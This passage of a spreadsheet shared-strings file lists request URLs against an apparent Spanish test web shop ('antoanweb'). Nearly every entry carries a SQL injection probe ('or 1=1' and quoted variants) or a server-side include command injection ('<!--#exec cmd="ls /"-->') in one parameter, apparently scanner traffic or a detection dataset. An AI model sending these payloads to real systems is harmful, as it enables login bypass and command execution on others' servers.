    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on+or+1=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar+or+1=1&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on'+and+'1'='1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar'+and+'1'='1&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on'+and+'1'='2&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar'+and+'1'='2&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on'+or+'1'='1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar'+or+'1'='1&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on"+and+"1"="1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar"+and+"1"="1&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on"+and+"1"="2&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar"+and+"1"="2&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on"+or+"1"="1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar"+or+"1"="1&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar+and+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85+and+1=1&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar+and+1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85'+and+'1'='1&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar+or+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85"+and+"1"="1&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar'+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar'+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar"+and+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar"+and+"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar+and+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85+and+1=1&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar+and+1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85'+and+'1'='1&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar+or+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85"+and+"1"="1&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar'+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar'+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar"+and+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar"+and+"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja+and+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro+and+1=1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pasar+por+caja+and+1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro'+and+'1'='1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pasar+por+caja+or+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro"+and+"1"="1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pasar+por+caja'+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja'+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja"+and+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja"+and+"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja"+or+"1"="1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+and+1=1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+and+1=2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+or+1=1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+and+'1'='1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+and+'1'='2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'+or+'1'='1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"+and+"1"="1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"+and+"1"="2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registrar"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;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&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;login=pepe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&lt;!--#execcmd="ls/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#execcmd="ls/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;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&lt;!--#execcmd="dir\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#execcmd="dir\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;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&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=&lt;!--#execcmd="ls/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2="&gt;&lt;!--#execcmd="ls/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=&lt;!--#exec+cmd="ls+/"--&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=&lt;!--#execcmd="dir\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2="&gt;&lt;!--#execcmd="dir\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=&lt;!--#exec+cmd="ls+/"--&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=&lt;!--#exec+cmd="ls+/"--&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=&lt;!--#exec+cmd="ls+/"--&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=&lt;!--#exec+cmd="ls+/"--&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=&lt;!--#exec+cmd="ls+/"--&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=&lt;!--#exec+cmd="ls+/"--&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=&lt;!--#exec+cmd="ls+/"--&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=&lt;!--#exec+cmd="ls+/"--&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;!--#exec+cmd="ls+/"--&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=&lt;!--#exec+cmd="ls+/"--&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=&lt;!--#exec+cmd="ls+/"--&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
